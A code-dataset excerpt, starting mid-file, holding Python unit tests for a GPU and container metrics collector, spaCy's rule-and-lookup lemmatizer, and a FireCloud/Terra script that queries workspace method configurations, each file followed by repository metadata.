            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        self.assertEqual(0, len(zombie_container.samples))
        self.assertEqual(1, len(external_process.samples))
        self.assertEqual("0",
                         external_process.samples[0].labels["minor_number"])
        self.assertEqual("44", external_process.samples[0].labels["pid"])
    def test_convert_to_metrics_with_real_id_BUGFIX(self):
        # Regression test: zombie_info holds *short* (12-char) container
        # ids while the pid mapping yields full ids; matching must still
        # succeed and the short id must appear in the metric label.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(20, 21, [22], nvidia.EccError(), "0",
                                   "GPU-uuid0", 50.0)
        ])
        # zombie_info is empty should also have external process metric
        zombie_info = {"ce5de12d6275"}
        pid_to_cid_mapping = {
            22:
            "ce5de12d6275dc05c9ec5b7f58484f075f4775d8f54f6a4be3dc1439344df356"
        }
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        self.assertEqual(1, len(zombie_container.samples))
        self.assertEqual("0",
                         zombie_container.samples[0].labels["minor_number"])
        self.assertEqual("ce5de12d6275",
                         zombie_container.samples[0].labels["container_id"])
class TestAtomicRef(base.TestBase):
    """
    Test AtomicRef in collector.py
    """
    def test_expiration(self):
        """A value set at time T stays readable for decay_time (10s) and
        expires strictly after; setting a new value resets the window."""
        ref = collector.AtomicRef(datetime.timedelta(seconds=10))
        now = datetime.datetime.now()
        delta = datetime.timedelta(seconds=1)
        ref.set(1, now)
        # assertEquals is a deprecated alias (removed in Python 3.12);
        # use assertEqual/assertIsNone instead.
        self.assertEqual(1, ref.get(now))
        self.assertEqual(1, ref.get(now - delta))
        self.assertEqual(1, ref.get(now + delta))
        self.assertEqual(1, ref.get(now + delta * 10))
        # Strictly past the decay window the value is gone ...
        self.assertIsNone(ref.get(now + delta * 11))
        # ... but querying with an earlier timestamp still sees it.
        self.assertEqual(1, ref.get(now + delta * 10))
        ref.set(2, now + delta)
        self.assertEqual(2, ref.get(now))
        self.assertEqual(2, ref.get(now + delta * 10))
        self.assertEqual(2, ref.get(now + delta * 11))
        self.assertIsNone(ref.get(now + delta * 12))
if __name__ == '__main__':
    # Allow running the suite directly: python test_collector.py
    unittest.main()
| 38.718107 | 128 | 0.634905 |
import os
import sys
import unittest
import datetime
import time
import logging
import base
sys.path.append(os.path.abspath("../src/"))
import collector
import nvidia
import docker_inspect
from collector import ContainerCollector
from collector import GpuCollector
logger = logging.getLogger(__name__)
class TestContainerCollector(base.TestBase):
def test_parse_from_labels(self):
inspect_result = docker_inspect.InspectResult(
"openmindstudio",
"trialslot_nnimain_d65bc5ac",
"tuner",
"0",
"this_is_pod_name_val",
"0,1,",
12345,
"dixu@example.com",
"platform",
False,
)
gpu_ids, labels = ContainerCollector.parse_from_labels(
inspect_result, None)
self.assertEqual(["0", "1"], gpu_ids)
target_labels = {
"username": "openmindstudio",
"job_name": "trialslot_nnimain_d65bc5ac",
"role_name": "tuner",
"task_index": "0",
"pod_name": "this_is_pod_name_val",
"user_email": "dixu@example.com",
"vc_name": "platform",
}
self.assertEqual(target_labels, labels)
def test_infer_service_name(self):
self.assertIsNone(
ContainerCollector.infer_service_name(
"k8s_POD_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8"
))
self.assertEqual(
"alertmanager",
ContainerCollector.infer_service_name(
"k8s_alertmanager_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8-a62d-000d3ab25bb6_2"
))
self.assertIsNone(
ContainerCollector.infer_service_name(
"k8s_kube-scheduler_kube-scheduler-10.151.40.4_kube-system_f1164d931979939cf0601155df9c748a_6"
))
class TestDockerCollector(base.TestBase):
def assert_metrics(self, metrics):
self.assertEqual(1, len(metrics))
self.assertEqual(1, len(metrics[0].samples))
sample = metrics[0].samples[0]
self.assertEqual(1, len(sample[1]))
self.assertEqual(1, sample[2])
def test_impl(self):
_, c = collector.instantiate_collector("test_docker_collector1", 0.5,
datetime.timedelta(seconds=1),
collector.DockerCollector)
self.assert_metrics(c.collect_impl())
def test_base_collector(self):
ref = collector.make_collector("test_docker_collector2", 0.5,
datetime.timedelta(seconds=10),
collector.DockerCollector)
metrics = None
for i in range(20):
metrics = ref.get(datetime.datetime.now())
if metrics is not None:
break
time.sleep(0.1)
self.assert_metrics(metrics)
class TestZombieCollector(base.TestBase):
def setUp(self):
t = str(time.time()).replace(".", "_")
decay_time = datetime.timedelta(seconds=1)
_, self.collector = collector.instantiate_collector(
"test_zombie_collector" + t, 0.5, decay_time,
collector.ZombieCollector, collector.AtomicRef(decay_time),
collector.AtomicRef(decay_time))
def test_update_zombie_count_type1(self):
start = datetime.datetime.now()
one_sec = datetime.timedelta(seconds=1)
type1_recorder = self.collector.type1_zombies
self.assertEqual(
set(), self.collector.update_zombie_count_type1({"a", "b"}, start))
self.assertEqual(2, len(type1_recorder))
self.assertEqual(
set(),
self.collector.update_zombie_count_type1(
{"a", "b"}, start + type1_recorder.decay_time - one_sec))
self.assertEqual(2, len(type1_recorder))
self.assertEqual({"a", "b"},
self.collector.update_zombie_count_type1(
{"a", "b"},
start + type1_recorder.decay_time + one_sec))
self.assertEqual(2, len(type1_recorder))
self.assertEqual({"a"},
self.collector.update_zombie_count_type1(
{"a"},
start + type1_recorder.decay_time + 2 * one_sec))
self.assertEqual(1, len(type1_recorder))
self.assertEqual(
set(),
self.collector.update_zombie_count_type1(
{}, start + type1_recorder.decay_time + 3 * one_sec))
self.assertEqual(0, len(type1_recorder))
def test_update_zombie_count_type2(self):
start = datetime.datetime.now()
one_sec = datetime.timedelta(seconds=1)
stats = {
"43ffe701d883": {
"name":
"core-caffe2_resnet50_20181012040921.586-container_e03_1539312078880_0780_01_000002",
"id":
"43ffe701d883"
},
"8de2f53e64cb": {
"name": "container_e03_1539312078880_0780_01_000002",
"id": "8de2f53e64cb"
}
}
type2_recorder = self.collector.type2_zombies
self.assertEqual(set(),
self.collector.update_zombie_count_type2(stats, start))
stats.pop("8de2f53e64cb")
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(stats, start + one_sec))
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(
stats, start + type2_recorder.decay_time))
self.assertEqual({"43ffe701d883"},
self.collector.update_zombie_count_type2(
stats,
start + type2_recorder.decay_time + 2 * one_sec))
stats.pop("43ffe701d883")
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(
stats, start + type2_recorder.decay_time + 3 * one_sec))
class TestGpuCollector(base.TestBase):
    """Tests for ``GpuCollector.convert_to_metrics``.

    Each scenario builds a one-GPU ``gpu_info`` structure and checks the
    tuple of Prometheus metric families the converter produces.  Note that
    ``gpu_retired`` is unpacked but not asserted in these cases.
    """
    def make_pid_to_cid_fn(self, mapping):
        # Stand-in for the pid -> container-id lookup used by the collector:
        # returns (True, cid) for known pids, (False, "") otherwise.
        def fn(pid):
            if pid in mapping:
                return True, mapping[pid]
            return False, ""
        return fn
    def test_convert_to_metrics(self):
        """Happy-path conversion across four GPU scenarios."""
        # Scenario 1: GPU 0 with pids 22/33/44.  33 maps to container "def"
        # (a zombie), 22 maps to "ghi" (not a zombie), 44 is unmapped and so
        # counts as an external process.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0",
                                   "GPU-uuid0", 37.0)
        ])
        zombie_info = {"abc", "def"}
        pid_to_cid_mapping = {33: "def", 22: "ghi"}
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        target_core_utils = collector.gen_gpu_util_gauge()
        target_core_utils.add_metric(["0", "GPU-uuid0"], 20)
        self.assertEqual(target_core_utils, core_utils)
        target_mem_utils = collector.gen_gpu_mem_util_gauge()
        target_mem_utils.add_metric(["0", "GPU-uuid0"], 21)
        self.assertEqual(target_mem_utils, mem_utils)
        # Default EccError() means all four counters are zero.
        target_ecc_errors = collector.gen_gpu_ecc_counter()
        target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_single"], 0)
        target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_double"], 0)
        target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_single"], 0)
        target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_double"], 0)
        self.assertEqual(target_ecc_errors, ecc_errors)
        target_mem_leak = collector.gen_gpu_memory_leak_counter()
        self.assertEqual(target_mem_leak, mem_leak)
        target_external_process = collector.gen_gpu_used_by_external_process_counter(
        )
        target_external_process.add_metric(["0", "44"], 1)
        self.assertEqual(target_external_process, external_process)
        target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
        )
        target_zombie_container.add_metric(["0", "def"], 1)
        self.assertEqual(target_zombie_container, zombie_container)
        target_gpu_temp = collector.gen_gpu_temperature_gauge()
        target_gpu_temp.add_metric(["0", "GPU-uuid0"], 37.0)
        self.assertEqual(target_gpu_temp, gpu_temp)
        # Scenario 2: GPU 1 with non-zero ECC error counts; pids 55/123 are
        # unmapped, so both show up as external processes and there are no
        # zombie-container samples.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(
                30, 31, [55, 123],
                nvidia.EccError(volatile_single=2,
                                volatile_double=3,
                                aggregated_single=4,
                                aggregated_double=5), "1", "GPU-uuid1", 24.0)
        ])
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        target_core_utils = collector.gen_gpu_util_gauge()
        target_core_utils.add_metric(["1", "GPU-uuid1"], 30)
        self.assertEqual(target_core_utils, core_utils)
        target_mem_utils = collector.gen_gpu_mem_util_gauge()
        target_mem_utils.add_metric(["1", "GPU-uuid1"], 31)
        self.assertEqual(target_mem_utils, mem_utils)
        target_ecc_errors = collector.gen_gpu_ecc_counter()
        target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_single"], 2)
        target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_double"], 3)
        target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_single"], 4)
        target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_double"], 5)
        self.assertEqual(target_ecc_errors, ecc_errors)
        target_mem_leak = collector.gen_gpu_memory_leak_counter()
        self.assertEqual(target_mem_leak, mem_leak)
        target_external_process = collector.gen_gpu_used_by_external_process_counter(
        )
        target_external_process.add_metric(["1", "55"], 1)
        target_external_process.add_metric(["1", "123"], 1)
        self.assertEqual(target_external_process, external_process)
        target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
        )
        self.assertEqual(target_zombie_container, zombie_container)
        target_gpu_temp = collector.gen_gpu_temperature_gauge()
        target_gpu_temp.add_metric(["1", "GPU-uuid1"], 24.0)
        self.assertEqual(target_gpu_temp, gpu_temp)
        # Scenario 3: memory usage exactly equal to the threshold argument
        # (20 * 1024 * 1024) must NOT be reported as a memory leak.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024, [], nvidia.EccError(),
                                   "2", "GPU-uuid2", 30.0)
        ])
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        target_core_utils = collector.gen_gpu_util_gauge()
        target_core_utils.add_metric(["2", "GPU-uuid2"], 40)
        self.assertEqual(target_core_utils, core_utils)
        target_mem_utils = collector.gen_gpu_mem_util_gauge()
        target_mem_utils.add_metric(["2", "GPU-uuid2"], 20 * 1024 * 1024)
        self.assertEqual(target_mem_utils, mem_utils)
        target_ecc_errors = collector.gen_gpu_ecc_counter()
        target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_single"], 0)
        target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_double"], 0)
        target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_single"], 0)
        target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_double"], 0)
        self.assertEqual(target_ecc_errors, ecc_errors)
        target_mem_leak = collector.gen_gpu_memory_leak_counter()
        self.assertEqual(target_mem_leak, mem_leak)
        target_external_process = collector.gen_gpu_used_by_external_process_counter(
        )
        self.assertEqual(target_external_process, external_process)
        target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
        )
        self.assertEqual(target_zombie_container, zombie_container)
        target_gpu_temp = collector.gen_gpu_temperature_gauge()
        target_gpu_temp.add_metric(["2", "GPU-uuid2"], 30.0)
        self.assertEqual(target_gpu_temp, gpu_temp)
        # Scenario 4: memory usage one byte above the threshold (note the
        # threshold passed here is 20 * 1024) -> reported as a memory leak.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024 + 1, [],
                                   nvidia.EccError(), "3", "GPU-uuid3", 30.0)
        ])
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        target_mem_leak = collector.gen_gpu_memory_leak_counter()
        target_mem_leak.add_metric(["3", "GPU-uuid3"], 1)
        self.assertEqual(target_mem_leak, mem_leak)
    def test_convert_to_metrics_with_no_zombie_info_BUGFIX(self):
        """Empty or ``None`` zombie_info must not crash and yields no
        zombie-container samples; external-process detection still works."""
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0",
                                   "GPU-uuid0", 40.0)
        ])
        zombie_info = []
        pid_to_cid_mapping = {
            33: "def",
            22: "ghi"
        }
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        self.assertEqual(0, len(zombie_container.samples))
        self.assertEqual(1, len(external_process.samples))
        self.assertEqual("0",
                         external_process.samples[0].labels["minor_number"])
        self.assertEqual("44", external_process.samples[0].labels["pid"])
        # Same expectations when zombie_info is None instead of empty.
        zombie_info = None
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        self.assertEqual(0, len(zombie_container.samples))
        self.assertEqual(1, len(external_process.samples))
        self.assertEqual("0",
                         external_process.samples[0].labels["minor_number"])
        self.assertEqual("44", external_process.samples[0].labels["pid"])
    def test_convert_to_metrics_with_real_id_BUGFIX(self):
        """zombie_info holds short (12-char) docker ids while the pid lookup
        returns the full 64-char id; matching must use the short prefix."""
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(20, 21, [22], nvidia.EccError(), "0",
                                   "GPU-uuid0", 50.0)
        ])
        zombie_info = {"ce5de12d6275"}
        pid_to_cid_mapping = {
            22:
            "ce5de12d6275dc05c9ec5b7f58484f075f4775d8f54f6a4be3dc1439344df356"
        }
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        self.assertEqual(1, len(zombie_container.samples))
        self.assertEqual("0",
                         zombie_container.samples[0].labels["minor_number"])
        self.assertEqual("ce5de12d6275",
                         zombie_container.samples[0].labels["container_id"])
class TestAtomicRef(base.TestBase):
    """Tests for ``collector.AtomicRef`` expiration semantics."""
    def test_expiration(self):
        """A value set at time T is readable for queries up to T + 10s.

        Expiration is evaluated per ``get`` call relative to the query time:
        a read past the window returns None, but the value is not cleared --
        a later read back inside the window succeeds again.
        """
        # Fix: replaced the deprecated ``assertEquals`` alias (removed in
        # Python 3.12) with ``assertEqual`` / ``assertIsNone``.
        ref = collector.AtomicRef(datetime.timedelta(seconds=10))
        now = datetime.datetime.now()
        delta = datetime.timedelta(seconds=1)
        ref.set(1, now)
        self.assertEqual(1, ref.get(now))
        # Querying before the set time still returns the value.
        self.assertEqual(1, ref.get(now - delta))
        self.assertEqual(1, ref.get(now + delta))
        self.assertEqual(1, ref.get(now + delta * 10))
        self.assertIsNone(ref.get(now + delta * 11))
        # Expired read above did not clear the value.
        self.assertEqual(1, ref.get(now + delta * 10))
        ref.set(2, now + delta)
        self.assertEqual(2, ref.get(now))
        self.assertEqual(2, ref.get(now + delta * 10))
        self.assertEqual(2, ref.get(now + delta * 11))
        self.assertIsNone(ref.get(now + delta * 12))
# Allow running this test module directly; unittest/pytest discovery also works.
if __name__ == '__main__':
    unittest.main()
| true | true |
f72eae12827e90588b406e44397f79f94ffd2658 | 5,224 | py | Python | spacy/lemmatizer.py | gandersen101/spaCy | 109849bd311490f17a29b320cb032e43d153f36f | [
"MIT"
] | null | null | null | spacy/lemmatizer.py | gandersen101/spaCy | 109849bd311490f17a29b320cb032e43d153f36f | [
"MIT"
] | null | null | null | spacy/lemmatizer.py | gandersen101/spaCy | 109849bd311490f17a29b320cb032e43d153f36f | [
"MIT"
] | null | null | null | # coding: utf8
from __future__ import unicode_literals
from collections import OrderedDict
from .symbols import NOUN, VERB, ADJ, PUNCT, PROPN
from .errors import Errors
from .lookups import Lookups
from .parts_of_speech import NAMES as UPOS_NAMES
class Lemmatizer(object):
    """
    The Lemmatizer supports simple part-of-speech-sensitive suffix rules and
    lookup tables.
    DOCS: https://spacy.io/api/lemmatizer
    """
    @classmethod
    def load(cls, *args, **kwargs):
        # Loading from a path is no longer supported; construct with a
        # Lookups object instead (Errors.E172 explains this to the caller).
        raise NotImplementedError(Errors.E172)
    def __init__(self, lookups, *args, is_base_form=None, **kwargs):
        """Initialize a Lemmatizer.
        lookups (Lookups): The lookups object containing the (optional) tables
            "lemma_rules", "lemma_index", "lemma_exc" and "lemma_lookup".
        is_base_form (callable): Optional predicate called as
            ``is_base_form(univ_pos, morphology)``; a truthy result means the
            string is already its own lemma and only lowercasing is applied.
        RETURNS (Lemmatizer): The newly constructed object.
        """
        # Extra positional/keyword args are rejected: the old signature took
        # separate tables, which is no longer supported (Errors.E173).
        if args or kwargs or not isinstance(lookups, Lookups):
            raise ValueError(Errors.E173)
        self.lookups = lookups
        self.is_base_form = is_base_form
    def __call__(self, string, univ_pos, morphology=None):
        """Lemmatize a string.
        string (unicode): The string to lemmatize, e.g. the token text.
        univ_pos (unicode / int): The token's universal part-of-speech tag.
        morphology (dict): The token's morphological features following the
            Universal Dependencies scheme.
        RETURNS (list): The available lemmas for the string.
        """
        lookup_table = self.lookups.get_table("lemma_lookup", {})
        # Without suffix rules, fall back to a plain table lookup.
        if "lemma_rules" not in self.lookups:
            return [lookup_table.get(string, string)]
        if isinstance(univ_pos, int):
            univ_pos = UPOS_NAMES.get(univ_pos, "X")
        univ_pos = univ_pos.lower()
        if univ_pos in ("", "eol", "space"):
            return [string.lower()]
        # See Issue #435 for example of where this logic is required.
        if callable(self.is_base_form) and self.is_base_form(univ_pos, morphology):
            return [string.lower()]
        index_table = self.lookups.get_table("lemma_index", {})
        exc_table = self.lookups.get_table("lemma_exc", {})
        rules_table = self.lookups.get_table("lemma_rules", {})
        # No data at all for this POS: keep casing for proper nouns,
        # lowercase everything else.
        if not any((index_table.get(univ_pos), exc_table.get(univ_pos), rules_table.get(univ_pos))):
            if univ_pos == "propn":
                return [string]
            else:
                return [string.lower()]
        lemmas = self.lemmatize(
            string,
            index_table.get(univ_pos, {}),
            exc_table.get(univ_pos, {}),
            rules_table.get(univ_pos, []),
        )
        return lemmas
    # POS-specific convenience wrappers around __call__.
    def noun(self, string, morphology=None):
        return self(string, "noun", morphology)
    def verb(self, string, morphology=None):
        return self(string, "verb", morphology)
    def adj(self, string, morphology=None):
        return self(string, "adj", morphology)
    def det(self, string, morphology=None):
        return self(string, "det", morphology)
    def pron(self, string, morphology=None):
        return self(string, "pron", morphology)
    def adp(self, string, morphology=None):
        return self(string, "adp", morphology)
    def num(self, string, morphology=None):
        return self(string, "num", morphology)
    def punct(self, string, morphology=None):
        return self(string, "punct", morphology)
    def lookup(self, string, orth=None):
        """Look up a lemma in the table, if available. If no lemma is found,
        the original string is returned.
        string (unicode): The original string.
        orth (int): Optional hash of the string to look up. If not set, the
            string will be used and hashed.
        RETURNS (unicode): The lemma if the string was found, otherwise the
            original string.
        """
        lookup_table = self.lookups.get_table("lemma_lookup", {})
        key = orth if orth is not None else string
        if key in lookup_table:
            return lookup_table[key]
        return string
    def lemmatize(self, string, index, exceptions, rules):
        """Apply suffix rules, exceptions and the index to produce lemma
        candidates for one (lowercased) string.
        string (unicode): The string to lemmatize.
        index (dict / set): Known valid lemmas for this POS.
        exceptions (dict): string -> list of exceptional lemma forms.
        rules (list): (old_suffix, new_suffix) replacement pairs.
        RETURNS (list): Candidate lemmas; never empty (falls back to the
            original string).
        """
        orig = string
        string = string.lower()
        forms = []
        # Rule outputs not confirmed by the index ("out of vocabulary") are
        # kept separately and only used if nothing better is found.
        oov_forms = []
        for old, new in rules:
            if string.endswith(old):
                form = string[: len(string) - len(old)] + new
                if not form:
                    pass
                elif form in index or not form.isalpha():
                    forms.append(form)
                else:
                    oov_forms.append(form)
        # Remove duplicates but preserve the ordering of applied "rules"
        forms = list(OrderedDict.fromkeys(forms))
        # Put exceptions at the front of the list, so they get priority.
        # This is a dodgy heuristic -- but it's the best we can do until we get
        # frequencies on this. We can at least prune out problematic exceptions,
        # if they shadow more frequent analyses.
        for form in exceptions.get(string, []):
            if form not in forms:
                forms.insert(0, form)
        if not forms:
            forms.extend(oov_forms)
        if not forms:
            forms.append(orig)
        return forms
| 37.049645 | 100 | 0.612749 |
from __future__ import unicode_literals
from collections import OrderedDict
from .symbols import NOUN, VERB, ADJ, PUNCT, PROPN
from .errors import Errors
from .lookups import Lookups
from .parts_of_speech import NAMES as UPOS_NAMES
class Lemmatizer(object):
    """
    The Lemmatizer supports simple part-of-speech-sensitive suffix rules and
    lookup tables.
    DOCS: https://spacy.io/api/lemmatizer
    """
    @classmethod
    def load(cls, *args, **kwargs):
        # Loading from a path is unsupported; construct with a Lookups object.
        raise NotImplementedError(Errors.E172)
    def __init__(self, lookups, *args, is_base_form=None, **kwargs):
        """Initialize a Lemmatizer.
        lookups (Lookups): The lookups object containing the (optional) tables
            "lemma_rules", "lemma_index", "lemma_exc" and "lemma_lookup".
        is_base_form (callable): Optional predicate ``(univ_pos, morphology)``
            whose truthy result means the string is already its own lemma.
        RETURNS (Lemmatizer): The newly constructed object.
        """
        if args or kwargs or not isinstance(lookups, Lookups):
            raise ValueError(Errors.E173)
        self.lookups = lookups
        self.is_base_form = is_base_form
    def __call__(self, string, univ_pos, morphology=None):
        """Lemmatize a string.
        string (unicode): The string to lemmatize, e.g. the token text.
        univ_pos (unicode / int): The token's universal part-of-speech tag.
        morphology (dict): The token's morphological features following the
            Universal Dependencies scheme.
        RETURNS (list): The available lemmas for the string.
        """
        lookup_table = self.lookups.get_table("lemma_lookup", {})
        if "lemma_rules" not in self.lookups:
            return [lookup_table.get(string, string)]
        if isinstance(univ_pos, int):
            univ_pos = UPOS_NAMES.get(univ_pos, "X")
        univ_pos = univ_pos.lower()
        if univ_pos in ("", "eol", "space"):
            return [string.lower()]
        # Fix: this line was corrupted to a bare ``.is_base_form(...)``
        # fragment (a syntax error); restored the full guard that skips
        # lemmatization when the token is already a base form.
        if callable(self.is_base_form) and self.is_base_form(univ_pos, morphology):
            return [string.lower()]
        index_table = self.lookups.get_table("lemma_index", {})
        exc_table = self.lookups.get_table("lemma_exc", {})
        rules_table = self.lookups.get_table("lemma_rules", {})
        # No data for this POS: keep casing for proper nouns, lowercase rest.
        if not any((index_table.get(univ_pos), exc_table.get(univ_pos), rules_table.get(univ_pos))):
            if univ_pos == "propn":
                return [string]
            else:
                return [string.lower()]
        lemmas = self.lemmatize(
            string,
            index_table.get(univ_pos, {}),
            exc_table.get(univ_pos, {}),
            rules_table.get(univ_pos, []),
        )
        return lemmas
    # POS-specific convenience wrappers around __call__.
    def noun(self, string, morphology=None):
        return self(string, "noun", morphology)
    def verb(self, string, morphology=None):
        return self(string, "verb", morphology)
    def adj(self, string, morphology=None):
        return self(string, "adj", morphology)
    def det(self, string, morphology=None):
        return self(string, "det", morphology)
    def pron(self, string, morphology=None):
        return self(string, "pron", morphology)
    def adp(self, string, morphology=None):
        return self(string, "adp", morphology)
    def num(self, string, morphology=None):
        return self(string, "num", morphology)
    def punct(self, string, morphology=None):
        return self(string, "punct", morphology)
    def lookup(self, string, orth=None):
        """Look up a lemma in the table; return the original string if absent.
        string (unicode): The original string.
        orth (int): Optional hash of the string to look up.
        RETURNS (unicode): The lemma, or the original string.
        """
        lookup_table = self.lookups.get_table("lemma_lookup", {})
        key = orth if orth is not None else string
        if key in lookup_table:
            return lookup_table[key]
        return string
    def lemmatize(self, string, index, exceptions, rules):
        """Apply suffix rules, exceptions and the index to produce lemma
        candidates; never returns an empty list."""
        orig = string
        string = string.lower()
        forms = []
        oov_forms = []
        for old, new in rules:
            if string.endswith(old):
                form = string[: len(string) - len(old)] + new
                if not form:
                    pass
                elif form in index or not form.isalpha():
                    forms.append(form)
                else:
                    oov_forms.append(form)
        # Remove duplicates but preserve the ordering of applied rules.
        forms = list(OrderedDict.fromkeys(forms))
        # Exceptions go first so they take priority over rule output; we
        # cannot rank properly without frequency data.
        for form in exceptions.get(string, []):
            if form not in forms:
                forms.insert(0, form)
        if not forms:
            forms.extend(oov_forms)
        if not forms:
            forms.append(orig)
        return forms
| true | true |
f72eaedaba0b8ff86ee1179bca09e69c0be08394 | 5,122 | py | Python | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | null | null | null | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | null | null | null | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | 1 | 2020-11-10T22:02:21.000Z | 2020-11-10T22:02:21.000Z | #!/usr/bin/env python3
import argparse
import copy
import datetime
#from firecloud import fiss
import json
import operator
import subprocess
import sys
import time
#print(fiss.meth_list(args=argparse.Namespace()))
import firecloud.api as fapi
# Terra/FireCloud billing project (namespace) and workspace this script reads.
SEL_NAMESPACE='um1-encode-y2s1'
SEL_WORKSPACE='selection-sim'
#dir(fapi)
#help(fapi)
# List all method configs in the workspace, then fetch one specific config.
# NOTE(review): both calls hit the live FireCloud API and assume success
# (no status check before .json()).
z = fapi.list_workspace_configs(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, allRepos=True).json()
print(z)
z = fapi.get_workspace_config(workspace=SEL_WORKSPACE, namespace=SEL_NAMESPACE,
                              config='dockstore-tool-cms2', cnamespace=SEL_NAMESPACE)
print('CONFIG_IS', z, z.json())
def dump_file(fname, value):
    """Write ``value`` (converted with ``str``) to the file ``fname``."""
    text = str(value)
    with open(fname, 'w') as out_file:
        out_file.write(text)
#z = fapi.create_submission(wnamespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE,
# cnamespace=SEL_NAMESPACE, config='dockstore-tool-cosi2')
#print('SUBMISSION IS', z, z.json())
#z = fapi.get_config_template(namespace='dockstore', method='dockstore-tool-cosi2', version=1)
#print(z.json())
def _pretty_print_json(json_dict, sort_keys=True):
"""Return a pretty-printed version of a dict converted to json, as a string."""
return json.dumps(json_dict, indent=4, separators=(',', ': '), sort_keys=sort_keys)
def _write_json(fname, **json_dict):
    """Pretty-print the keyword args as JSON into ``fname``, then run the
    org-conversion helper script on the resulting file."""
    rendered = _pretty_print_json(json_dict)
    dump_file(fname=fname, value=rendered)
    print('converting', fname, 'to org')
    subprocess.check_call(f'./util/to_org.sh {fname}', shell=True)
    print('converted', fname, 'to org')
def get_workflow_metadata_gz(namespace, workspace, submission_id, workflow_id):
    """Request the metadata for a workflow in a submission.

    Variant of fiss's get_workflow_metadata that asks the server for a
    gzip-compressed response via the Accept-Encoding/User-Agent headers.

    Args:
        namespace (str): project to which workspace belongs
        workspace (str): Workspace name
        submission_id (str): Submission's unique identifier
        workflow_id (str): Workflow's unique identifier.
    Swagger:
        https://api.firecloud.org/#!/Submissions/workflowMetadata
    """
    uri = "workspaces/{0}/{1}/submissions/{2}/workflows/{3}".format(namespace,
                                                    workspace, submission_id, workflow_id)
    # deepcopy so the shared fiss agent headers are not mutated.
    headers = copy.deepcopy(fapi._fiss_agent_header())
    headers.update({'Accept-Encoding': 'gzip', 'User-Agent': 'gzip'})
    # NOTE(review): relies on firecloud.api's private ``__get`` helper --
    # fragile across fiss versions; confirm it still exists when upgrading.
    return fapi.__get(uri, headers=headers)
#print('ENTITIES ARE', fapi.list_entity_types(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE).json())
# Dump all workspace submissions, then walk today's submissions newest-first,
# saving each submission record and its workflow metadata under tmp/.
